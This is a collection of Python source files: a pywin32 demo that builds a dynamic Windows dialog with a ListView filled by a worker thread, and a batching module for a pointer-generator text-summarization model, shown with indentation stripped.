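# Hedged usage sketch for generate_data_tensor with array inputs (names are
# illustrative assumptions). The returned `cr` is an ArrayFlow whose threads
# must be launched so its FIFO queue gets filled:
#
#     X_t, Y_t, cr = generate_data_tensor(X_train, Y_train, batch_size=32)
#     with tf.Session() as sess:
#         if cr is not None:
#             cr.launch_threads(sess, num_threads=2)
#         x_batch, y_batch = sess.run([X_t, Y_t])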
|
win32gui_dialog.py
|
# A demo of a fairly complex dialog.
#
# Features:
# * Uses a "dynamic dialog resource" to build the dialog.
# * Uses a ListView control.
# * Dynamically resizes content.
# * Uses a second worker thread to fill the list.
# * Demonstrates support for Windows XP themes.
# If you are on Windows XP, and specify a '--noxp' argument, you will see:
# * alpha-blend issues with icons
# * The buttons are "old" style, rather than based on the XP theme.
# Hence, using:
# import winxpgui as win32gui
# is recommended.
# Please report any problems.
import sys
if "--noxp" in sys.argv:
import win32gui
else:
import winxpgui as win32gui
import win32gui_struct
import win32api
import win32con, winerror
import struct, array
import commctrl
import queue
import os
IDC_SEARCHTEXT = 1024
IDC_BUTTON_SEARCH = 1025
IDC_BUTTON_DISPLAY = 1026
IDC_LISTBOX = 1027
WM_SEARCH_RESULT = win32con.WM_USER + 512
WM_SEARCH_FINISHED = win32con.WM_USER + 513
class _WIN32MASKEDSTRUCT:
def __init__(self, **kw):
full_fmt = ""
for name, fmt, default, mask in self._struct_items_:
self.__dict__[name] = None
if fmt == "z":
full_fmt += "pi"
else:
full_fmt += fmt
for name, val in kw.items():
if name not in self.__dict__:
raise ValueError("LVITEM structures do not have an item '%s'" % (name,))
self.__dict__[name] = val
def __setattr__(self, attr, val):
if not attr.startswith("_") and attr not in self.__dict__:
raise AttributeError(attr)
self.__dict__[attr] = val
def toparam(self):
self._buffs = []
full_fmt = ""
vals = []
mask = 0
# calc the mask
for name, fmt, default, this_mask in self._struct_items_:
if this_mask is not None and self.__dict__.get(name) is not None:
mask |= this_mask
self.mask = mask
for name, fmt, default, this_mask in self._struct_items_:
val = self.__dict__[name]
if fmt == "z":
fmt = "Pi"
if val is None:
vals.append(0)
vals.append(0)
else:
# Note this demo still works with byte strings. An
# alternate strategy would be to use unicode natively
# and use the 'W' version of the messages - eg,
# LVM_SETITEMW etc.
val = val + "\0"
if isinstance(val, str):
val = val.encode("mbcs")
str_buf = array.array("b", val)
vals.append(str_buf.buffer_info()[0])
vals.append(len(val))
self._buffs.append(str_buf) # keep alive during the call.
else:
if val is None:
val = default
vals.append(val)
full_fmt += fmt
return struct.pack(*(full_fmt,) + tuple(vals))
# NOTE: See the win32gui_struct module for an alternative way of dealing
# with these structures
class LVITEM(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("iItem", "i", 0, None),
("iSubItem", "i", 0, None),
("state", "I", 0, commctrl.LVIF_STATE),
("stateMask", "I", 0, None),
("text", "z", None, commctrl.LVIF_TEXT),
("iImage", "i", 0, commctrl.LVIF_IMAGE),
("lParam", "i", 0, commctrl.LVIF_PARAM),
("iIdent", "i", 0, None),
]
class LVCOLUMN(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("fmt", "i", 0, commctrl.LVCF_FMT),
("cx", "i", 0, commctrl.LVCF_WIDTH),
("text", "z", None, commctrl.LVCF_TEXT),
("iSubItem", "i", 0, commctrl.LVCF_SUBITEM),
("iImage", "i", 0, commctrl.LVCF_IMAGE),
("iOrder", "i", 0, commctrl.LVCF_ORDER),
]
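# Illustrative sketch (an assumption, not part of the demo): fields assigned on
# these structs are packed by toparam(), which also computes the mask
# automatically from whichever masked fields were set:
#
#     item = LVITEM(iItem=0, text="hello")
#     buf = item.toparam()  # packed buffer ready for LVM_INSERTITEM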
class DemoWindowBase:
def __init__(self):
win32gui.InitCommonControls()
self.hinst = win32gui.dllhandle
self.list_data = {}
def _RegisterWndClass(self):
className = "PythonDocSearch"
message_map = {}
wc = win32gui.WNDCLASS()
wc.SetDialogProc() # Make it a dialog class.
wc.hInstance = self.hinst
wc.lpszClassName = className
wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW
wc.hCursor = win32gui.LoadCursor( 0, win32con.IDC_ARROW )
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.lpfnWndProc = message_map # could also specify a wndproc.
# C code: wc.cbWndExtra = DLGWINDOWEXTRA + sizeof(HBRUSH) + (sizeof(COLORREF));
wc.cbWndExtra = win32con.DLGWINDOWEXTRA + struct.calcsize("Pi")
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
## py.ico went away in python 2.5, load from executable instead
this_app=win32api.GetModuleHandle(None)
try:
wc.hIcon=win32gui.LoadIcon(this_app, 1) ## python.exe and pythonw.exe
except win32gui.error:
wc.hIcon=win32gui.LoadIcon(this_app, 135) ## pythonwin's icon
try:
classAtom = win32gui.RegisterClass(wc)
except win32gui.error as err_info:
if err_info.winerror!=winerror.ERROR_CLASS_ALREADY_EXISTS:
raise
return className
def _GetDialogTemplate(self, dlgClassName):
style = win32con.WS_THICKFRAME | win32con.WS_POPUP | win32con.WS_VISIBLE | win32con.WS_CAPTION | win32con.WS_SYSMENU | win32con.DS_SETFONT | win32con.WS_MINIMIZEBOX
cs = win32con.WS_CHILD | win32con.WS_VISIBLE
title = "Dynamic Dialog Demo"
# Window frame and title
dlg = [ [title, (0, 0, 210, 250), style, None, (8, "MS Sans Serif"), None, dlgClassName], ]
# ID label and text box
dlg.append([130, "Enter something", -1, (5, 5, 200, 9), cs | win32con.SS_LEFT])
s = cs | win32con.WS_TABSTOP | win32con.WS_BORDER
dlg.append(['EDIT', None, IDC_SEARCHTEXT, (5, 15, 200, 12), s])
# Search/Display Buttons
# (x positions don't matter here)
s = cs | win32con.WS_TABSTOP
dlg.append([128, "Fill List", IDC_BUTTON_SEARCH, (5, 35, 50, 14), s | win32con.BS_DEFPUSHBUTTON])
s = win32con.BS_PUSHBUTTON | s
dlg.append([128, "Display", IDC_BUTTON_DISPLAY, (100, 35, 50, 14), s])
# List control.
# Can't make this work :(
## s = cs | win32con.WS_TABSTOP
## dlg.append(['SysListView32', "Title", IDC_LISTBOX, (5, 505, 200, 200), s])
return dlg
def _DoCreate(self, fn):
message_map = {
win32con.WM_SIZE: self.OnSize,
win32con.WM_COMMAND: self.OnCommand,
win32con.WM_NOTIFY: self.OnNotify,
win32con.WM_INITDIALOG: self.OnInitDialog,
win32con.WM_CLOSE: self.OnClose,
win32con.WM_DESTROY: self.OnDestroy,
WM_SEARCH_RESULT: self.OnSearchResult,
WM_SEARCH_FINISHED: self.OnSearchFinished,
}
dlgClassName = self._RegisterWndClass()
template = self._GetDialogTemplate(dlgClassName)
return fn(self.hinst, template, 0, message_map)
def _SetupList(self):
child_style = win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_BORDER | win32con.WS_HSCROLL | win32con.WS_VSCROLL
child_style |= commctrl.LVS_SINGLESEL | commctrl.LVS_SHOWSELALWAYS | commctrl.LVS_REPORT
self.hwndList = win32gui.CreateWindow("SysListView32", None, child_style, 0, 0, 100, 100, self.hwnd, IDC_LISTBOX, self.hinst, None)
child_ex_style = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETEXTENDEDLISTVIEWSTYLE, 0, 0)
child_ex_style |= commctrl.LVS_EX_FULLROWSELECT
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETEXTENDEDLISTVIEWSTYLE, 0, child_ex_style)
# Add an image list - use the builtin shell folder icon - this
# demonstrates the problem with alpha-blending of icons on XP if
# winxpgui is not used in place of win32gui.
il = win32gui.ImageList_Create(
win32api.GetSystemMetrics(win32con.SM_CXSMICON),
win32api.GetSystemMetrics(win32con.SM_CYSMICON),
commctrl.ILC_COLOR32 | commctrl.ILC_MASK,
1, # initial size
0) # cGrow
shell_dll = os.path.join(win32api.GetSystemDirectory(), "shell32.dll")
large, small = win32gui.ExtractIconEx(shell_dll, 4, 1)
win32gui.ImageList_ReplaceIcon(il, -1, small[0])
win32gui.DestroyIcon(small[0])
win32gui.DestroyIcon(large[0])
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETIMAGELIST,
commctrl.LVSIL_SMALL, il)
# Setup the list control columns.
lvc = LVCOLUMN(mask = commctrl.LVCF_FMT | commctrl.LVCF_WIDTH | commctrl.LVCF_TEXT | commctrl.LVCF_SUBITEM)
lvc.fmt = commctrl.LVCFMT_LEFT
lvc.iSubItem = 1
lvc.text = "Title"
lvc.cx = 200
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
lvc.iSubItem = 0
lvc.text = "Order"
lvc.cx = 50
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
win32gui.UpdateWindow(self.hwnd)
def ClearListItems(self):
win32gui.SendMessage(self.hwndList, commctrl.LVM_DELETEALLITEMS)
self.list_data = {}
def AddListItem(self, data, *columns):
num_items = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETITEMCOUNT)
item = LVITEM(text=columns[0], iItem = num_items)
new_index = win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTITEM, 0, item.toparam())
col_no = 1
for col in columns[1:]:
item = LVITEM(text=col, iItem = new_index, iSubItem = col_no)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETITEM, 0, item.toparam())
col_no += 1
self.list_data[new_index] = data
def OnInitDialog(self, hwnd, msg, wparam, lparam):
self.hwnd = hwnd
# centre the dialog
desktop = win32gui.GetDesktopWindow()
l,t,r,b = win32gui.GetWindowRect(self.hwnd)
dt_l, dt_t, dt_r, dt_b = win32gui.GetWindowRect(desktop)
centre_x, centre_y = win32gui.ClientToScreen( desktop, ( (dt_r-dt_l)//2, (dt_b-dt_t)//2) )
win32gui.MoveWindow(hwnd, centre_x-(r//2), centre_y-(b//2), r-l, b-t, 0)
self._SetupList()
l,t,r,b = win32gui.GetClientRect(self.hwnd)
self._DoSize(r-l,b-t, 1)
def _DoSize(self, cx, cy, repaint = 1):
# right-justify the textbox.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_SEARCHTEXT)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
win32gui.MoveWindow(ctrl, l, t, cx-l-5, b-t, repaint)
# The button.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_BUTTON_DISPLAY)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
list_y = b + 10
w = r - l
win32gui.MoveWindow(ctrl, cx - 5 - w, t, w, b-t, repaint)
# The list control
win32gui.MoveWindow(self.hwndList, 0, list_y, cx, cy-list_y, repaint)
# The last column of the list control.
new_width = cx - win32gui.SendMessage(self.hwndList, commctrl.LVM_GETCOLUMNWIDTH, 0)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETCOLUMNWIDTH, 1, new_width)
def OnSize(self, hwnd, msg, wparam, lparam):
x = win32api.LOWORD(lparam)
y = win32api.HIWORD(lparam)
self._DoSize(x,y)
return 1
def OnSearchResult(self, hwnd, msg, wparam, lparam):
try:
while 1:
params = self.result_queue.get(0)
self.AddListItem(*params)
except queue.Empty:
pass
def OnSearchFinished(self, hwnd, msg, wparam, lparam):
print("OnSearchFinished")
def OnNotify(self, hwnd, msg, wparam, lparam):
info = win32gui_struct.UnpackNMITEMACTIVATE(lparam)
if info.code == commctrl.NM_DBLCLK:
print("Double click on item", info.iItem+1)
return 1
def OnCommand(self, hwnd, msg, wparam, lparam):
id = win32api.LOWORD(wparam)
if id == IDC_BUTTON_SEARCH:
self.ClearListItems()
def fill_slowly(q, hwnd):
import time
for i in range(20):
q.put(("whatever", str(i+1), "Search result " + str(i) ))
win32gui.PostMessage(hwnd, WM_SEARCH_RESULT, 0, 0)
time.sleep(.25)
win32gui.PostMessage(hwnd, WM_SEARCH_FINISHED, 0, 0)
import threading
self.result_queue = queue.Queue()
thread = threading.Thread(target = fill_slowly, args=(self.result_queue, self.hwnd) )
thread.start()
elif id == IDC_BUTTON_DISPLAY:
print("Display button selected")
sel = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETNEXTITEM, -1, commctrl.LVNI_SELECTED)
print("The selected item is", sel+1)
    # These functions differ based on how the window is used, so may be overridden
def OnClose(self, hwnd, msg, wparam, lparam):
raise NotImplementedError
def OnDestroy(self, hwnd, msg, wparam, lparam):
pass
# An implementation suitable for use with the Win32 Window functions (ie, not
# a true dialog)
class DemoWindow(DemoWindowBase):
def CreateWindow(self):
# Create the window via CreateDialogBoxIndirect - it can then
# work as a "normal" window, once a message loop is established.
self._DoCreate(win32gui.CreateDialogIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.DestroyWindow(hwnd)
        # We need to arrange for a WM_QUIT message to be sent to our
        # PumpMessages() loop.
def OnDestroy(self, hwnd, msg, wparam, lparam):
win32gui.PostQuitMessage(0) # Terminate the app.
# An implementation suitable for use with the Win32 Dialog functions.
class DemoDialog(DemoWindowBase):
def DoModal(self):
return self._DoCreate(win32gui.DialogBoxIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.EndDialog(hwnd, 0)
def DemoModal():
w=DemoDialog()
w.DoModal()
def DemoCreateWindow():
w=DemoWindow()
w.CreateWindow()
# PumpMessages runs until PostQuitMessage() is called by someone.
win32gui.PumpMessages()
if __name__=='__main__':
DemoModal()
DemoCreateWindow()
|
batcher.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
# Modifications Copyright 2017 Abigail See
# Modifications made 2018 by Logan Lebanoff
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""This file contains code to process data into batches"""
import Queue
from random import shuffle
from threading import Thread
import time
import numpy as np
import data
import nltk
from convert_data import process_sent
import util
from absl import logging
class Example(object):
"""Class representing a train/val/test example for text summarization."""
def __init__(self, article, abstract_sentences, all_abstract_sentences, doc_indices, raw_article_sents, vocab, hps):
"""Initializes the Example, performing tokenization and truncation to produce the encoder, decoder and target sequences, which are stored in self.
Args:
article: source text; a string. each token is separated by a single space.
abstract_sentences: list of strings, one per abstract sentence. In each sentence, each token is separated by a single space.
vocab: Vocabulary object
hps: hyperparameters
"""
self.hps = hps
# Get ids of special tokens
start_decoding = vocab.word2id(data.START_DECODING)
stop_decoding = vocab.word2id(data.STOP_DECODING)
# Process the article
article_words = article.split()
if len(article_words) > hps.max_enc_steps:
article_words = article_words[:hps.max_enc_steps]
self.enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token
# Process the abstract
abstract = ' '.join(abstract_sentences) # string
abstract_words = abstract.split() # list of strings
abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token
# Get the decoder input sequence and target sequence
self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, hps.max_dec_steps, start_decoding, stop_decoding)
self.dec_len = len(self.dec_input)
# If using pointer-generator mode, we need to store some extra info
if hps.pointer_gen:
if raw_article_sents is not None and len(raw_article_sents) > 0:
self.tokenized_sents = [process_sent(sent) for sent in raw_article_sents]
self.word_ids_sents, self.article_oovs = data.tokenizedarticle2ids(self.tokenized_sents, vocab)
self.enc_input_extend_vocab = util.flatten_list_of_lists(self.word_ids_sents)
self.enc_len = len(self.enc_input_extend_vocab) # store the length after truncation but before padding
else:
# Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
article_str = util.to_unicode(article)
raw_article_sents = nltk.tokenize.sent_tokenize(article_str)
self.tokenized_sents = [process_sent(sent) for sent in raw_article_sents]
self.word_ids_sents, self.article_oovs = data.tokenizedarticle2ids(self.tokenized_sents, vocab)
self.enc_input_extend_vocab = util.flatten_list_of_lists(self.word_ids_sents)
# self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
self.enc_len = len(self.enc_input_extend_vocab) # store the length after truncation but before padding
            # Get a version of the reference summary where in-article OOVs are represented by their temporary article OOV id
abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
# Overwrite decoder target sequence so it uses the temp article OOV ids
_, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, hps.max_dec_steps, start_decoding, stop_decoding)
# Store the original strings
self.original_article = article
self.raw_article_sents = raw_article_sents
self.original_abstract = abstract
self.original_abstract_sents = abstract_sentences
self.all_original_abstract_sents = all_abstract_sentences
self.doc_indices = doc_indices
def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
"""Given the reference summary as a sequence of tokens, return the input sequence for the decoder, and the target sequence which we will use to calculate loss. The sequence will be truncated if it is longer than max_len. The input sequence must start with the start_id and the target sequence must end with the stop_id (but not if it's been truncated).
Args:
sequence: List of ids (integers)
max_len: integer
start_id: integer
stop_id: integer
Returns:
inp: sequence length <=max_len starting with start_id
target: sequence same length as input, ending with stop_id only if there was no truncation
"""
inp = [start_id] + sequence[:]
target = sequence[:]
if len(inp) > max_len: # truncate
inp = inp[:max_len]
target = target[:max_len] # no end_token
else: # no truncation
target.append(stop_id) # end token
assert len(inp) == len(target)
return inp, target
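    # Worked example (illustrative) for get_dec_inp_targ_seqs: with
    # sequence=[3, 5], max_len=4, start_id=1, stop_id=2 it returns
    #   inp    = [1, 3, 5]
    #   target = [3, 5, 2]  # stop_id appended because nothing was truncated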
def pad_decoder_inp_targ(self, max_len, pad_id):
"""Pad decoder input and target sequences with pad_id up to max_len."""
while len(self.dec_input) < max_len:
self.dec_input.append(pad_id)
while len(self.target) < max_len:
self.target.append(pad_id)
def pad_encoder_input(self, max_len, pad_id):
"""Pad the encoder input sequence with pad_id up to max_len."""
while len(self.enc_input) < max_len:
self.enc_input.append(pad_id)
if self.hps.pointer_gen:
while len(self.enc_input_extend_vocab) < max_len:
self.enc_input_extend_vocab.append(pad_id)
def pad_doc_indices(self, max_len, pad_id):
"""Pad the encoder input sequence with pad_id up to max_len."""
while len(self.doc_indices) < max_len:
self.doc_indices.append(pad_id)
class Batch(object):
"""Class representing a minibatch of train/val/test examples for text summarization."""
def __init__(self, example_list, hps, vocab):
"""Turns the example_list into a Batch object.
Args:
example_list: List of Example objects
hps: hyperparameters
vocab: Vocabulary object
"""
self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences
self.init_encoder_seq(example_list, hps) # initialize the input to the encoder
self.init_decoder_seq(example_list, hps) # initialize the input and targets for the decoder
self.store_orig_strings(example_list) # store the original strings
def init_encoder_seq(self, example_list, hps):
"""Initializes the following:
self.enc_batch:
numpy array of shape (batch_size, <=max_enc_steps) containing integer ids (all OOVs represented by UNK id), padded to length of longest sequence in the batch
self.enc_lens:
numpy array of shape (batch_size) containing integers. The (truncated) length of each encoder input sequence (pre-padding).
self.enc_padding_mask:
numpy array of shape (batch_size, <=max_enc_steps), containing 1s and 0s. 1s correspond to real tokens in enc_batch and target_batch; 0s correspond to padding.
If hps.pointer_gen, additionally initializes the following:
self.max_art_oovs:
maximum number of in-article OOVs in the batch
self.art_oovs:
list of list of in-article OOVs (strings), for each example in the batch
self.enc_batch_extend_vocab:
Same as self.enc_batch, but in-article OOVs are represented by their temporary article OOV number.
"""
# Determine the maximum length of the encoder input sequence in this batch
max_enc_seq_len = max([ex.enc_len for ex in example_list])
# Pad the encoder input sequences up to the length of the longest sequence
for ex in example_list:
ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
ex.pad_doc_indices(max_enc_seq_len, 0)
# Initialize the numpy arrays
# Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
self.enc_batch = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.int32)
self.enc_lens = np.zeros((hps.batch_size), dtype=np.int32)
self.enc_padding_mask = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.float32)
self.doc_indices = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.enc_batch[i, :] = ex.enc_input[:]
self.enc_lens[i] = ex.enc_len
for j in xrange(ex.enc_len):
self.enc_padding_mask[i][j] = 1
self.doc_indices[i, :] = ex.doc_indices
# For pointer-generator mode, need to store some extra info
if hps.pointer_gen:
# Determine the max number of in-article OOVs in this batch
self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
# Store the in-article OOVs themselves
self.art_oovs = [ex.article_oovs for ex in example_list]
# Store the version of the enc_batch that uses the article OOV ids
self.enc_batch_extend_vocab = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.int32)
for i, ex in enumerate(example_list):
self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]
def init_decoder_seq(self, example_list, hps):
"""Initializes the following:
self.dec_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids as input for the decoder, padded to max_dec_steps length.
self.target_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids for the target sequence, padded to max_dec_steps length.
self.dec_padding_mask:
numpy array of shape (batch_size, max_dec_steps), containing 1s and 0s. 1s correspond to real tokens in dec_batch and target_batch; 0s correspond to padding.
"""
# Pad the inputs and targets
for ex in example_list:
ex.pad_decoder_inp_targ(hps.max_dec_steps, self.pad_id)
# Initialize the numpy arrays.
# Note: our decoder inputs and targets must be the same length for each batch (second dimension = max_dec_steps) because we do not use a dynamic_rnn for decoding. However I believe this is possible, or will soon be possible, with Tensorflow 1.0, in which case it may be best to upgrade to that.
self.dec_batch = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.int32)
self.target_batch = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.int32)
self.dec_padding_mask = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.dec_batch[i, :] = ex.dec_input[:]
self.target_batch[i, :] = ex.target[:]
for j in xrange(ex.dec_len):
self.dec_padding_mask[i][j] = 1
def store_orig_strings(self, example_list):
"""Store the original article and abstract strings in the Batch object"""
self.original_articles = [ex.original_article for ex in example_list] # list of lists
self.raw_article_sents = [ex.raw_article_sents for ex in example_list]
self.tokenized_sents = [ex.tokenized_sents for ex in example_list]
self.word_ids_sents = [ex.word_ids_sents for ex in example_list]
self.original_abstracts = [ex.original_abstract for ex in example_list] # list of lists
self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list] # list of list of lists
self.all_original_abstracts_sents = [ex.all_original_abstract_sents for ex in example_list] # list of list of list of lists
class Batcher(object):
"""A class to generate minibatches of data. Buckets examples together based on length of the encoder sequence."""
BATCH_QUEUE_MAX = 100 # max number of batches the batch_queue can hold
def __init__(self, data_path, vocab, hps, single_pass, cnn_500_dm_500=False):
"""Initialize the batcher. Start threads that process the data into batches.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary object
hps: hyperparameters
single_pass: If True, run through the dataset exactly once (useful for when you want to run evaluation on the dev or test set). Otherwise generate random batches indefinitely (useful for training).
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._single_pass = single_pass
self._cnn_500_dm_500 = cnn_500_dm_500
# Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
self._batch_queue = Queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = Queue.Queue(self.BATCH_QUEUE_MAX * self._hps.batch_size)
# Different settings depending on whether we're in single_pass mode or not
if single_pass:
self._num_example_q_threads = 1 # just one thread, so we read through the dataset just once
self._num_batch_q_threads = 1 # just one thread to batch examples
self._bucketing_cache_size = 1 # only load one batch's worth of examples before bucketing; this essentially means no bucketing
self._finished_reading = False # this will tell us when we're finished reading the dataset
else:
self._num_example_q_threads = 16 # num threads to fill example queue
self._num_batch_q_threads = 4 # num threads to fill batch queue
self._bucketing_cache_size = 100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in xrange(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in xrange(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
if not single_pass: # We don't want a watcher in single_pass mode because the threads shouldn't run forever
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
"""Return a Batch from the batch queue.
If mode='decode' or 'calc_features' then each batch contains a single example repeated beam_size-many times; this is necessary for beam search.
Returns:
batch: a Batch object, or None if we're in single_pass mode and we've exhausted the dataset.
"""
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
if self._single_pass and self._finished_reading:
logging.info("Finished reading dataset in single_pass mode.")
return None
batch = self._batch_queue.get() # get the next Batch
return batch
def fill_example_queue(self):
"""Reads data from file and processes into Examples which are then placed into the example queue."""
input_gen = self.text_generator(
data.example_generator(self._data_path, self._single_pass, self._cnn_500_dm_500))
# counter = 0
while True:
try:
(article,
abstracts, doc_indices_str, raw_article_sents) = input_gen.next() # read the next example from file. article and abstract are both strings.
except StopIteration: # if there are no more examples:
logging.info("The example generator for this example queue filling thread has exhausted data.")
if self._single_pass:
logging.info(
"single_pass mode is on, so we've finished reading dataset. This thread is stopping.")
self._finished_reading = True
break
else:
raise Exception("single_pass mode is off but the example generator is out of data; error.")
all_abstract_sentences = [[sent.strip() for sent in data.abstract2sents(
abstract)] for abstract in abstracts]
if len(all_abstract_sentences) != 0:
abstract_sentences = all_abstract_sentences[0]
else:
abstract_sentences = []
doc_indices = [int(idx) for idx in doc_indices_str.strip().split()]
example = Example(article, abstract_sentences, all_abstract_sentences, doc_indices, raw_article_sents, self._vocab, self._hps) # Process into an Example.
self._example_queue.put(example) # place the Example in the example queue.
# print "example num", counter
# counter += 1
def fill_batch_queue(self):
"""Takes Examples out of example queue, sorts them by encoder sequence length, processes into Batches and places them in the batch queue.
In decode mode, makes batches that each contain a single example repeated.
"""
while True:
# print 'hi'
if self._hps.mode != 'decode' and self._hps.mode != 'calc_features':
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in xrange(self._hps.batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
inputs = sorted(inputs, key=lambda inp: inp.enc_len) # sort by length of encoder sequence
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in xrange(0, len(inputs), self._hps.batch_size):
batches.append(inputs[i:i + self._hps.batch_size])
if not self._single_pass:
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._hps, self._vocab))
elif self._hps.mode == 'decode': # beam search decode mode
ex = self._example_queue.get()
b = [ex for _ in xrange(self._hps.batch_size)]
self._batch_queue.put(Batch(b, self._hps, self._vocab))
else: # calc features mode
inputs = []
for _ in xrange(self._hps.batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
# print "_ %d"%_
# print "inputs len%d"%len(inputs)
# Group the sorted Examples into batches, and place in the batch queue.
batches = []
for i in xrange(0, len(inputs), self._hps.batch_size):
# print i
batches.append(inputs[i:i + self._hps.batch_size])
# if not self._single_pass:
# shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._hps, self._vocab))
def watch_threads(self):
"""Watch example queue and batch queue threads and restart if dead."""
while True:
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def text_generator(self, example_generator):
"""Generates article and abstract text from tf.Example.
Args:
example_generator: a generator of tf.Examples from file. See data.example_generator"""
while True:
e = example_generator.next() # e is a tf.Example
abstract_texts = []
raw_article_sents = []
try:
article_text = e.features.feature['article'].bytes_list.value[0] # the article text was saved under the key 'article' in the data files
for abstract in e.features.feature['abstract'].bytes_list.value:
abstract_texts.append(abstract) # the abstract text was saved under the key 'abstract' in the data files
if 'doc_indices' not in e.features.feature or len(e.features.feature['doc_indices'].bytes_list.value) == 0:
num_words = len(article_text.split())
doc_indices_text = '0 ' * num_words
else:
doc_indices_text = e.features.feature['doc_indices'].bytes_list.value[0]
for sent in e.features.feature['raw_article_sents'].bytes_list.value:
                    raw_article_sents.append(sent)  # the raw article sentences were saved under the key 'raw_article_sents' in the data files
except ValueError:
logging.error('Failed to get article or abstract from example')
continue
if len(article_text)==0: # See https://github.com/abisee/pointer-generator/issues/1
logging.warning('Found an example with empty article text. Skipping it.')
else:
yield (article_text, abstract_texts, doc_indices_text, raw_article_sents)
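# Hedged usage sketch (vocab and hps are illustrative assumptions: a Vocabulary
# object and a hyperparameter namespace with the fields referenced above):
#
#     batcher = Batcher('data/train_*.bin', vocab, hps, single_pass=False)
#     batch = batcher.next_batch()  # blocks until a Batch is ready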
|
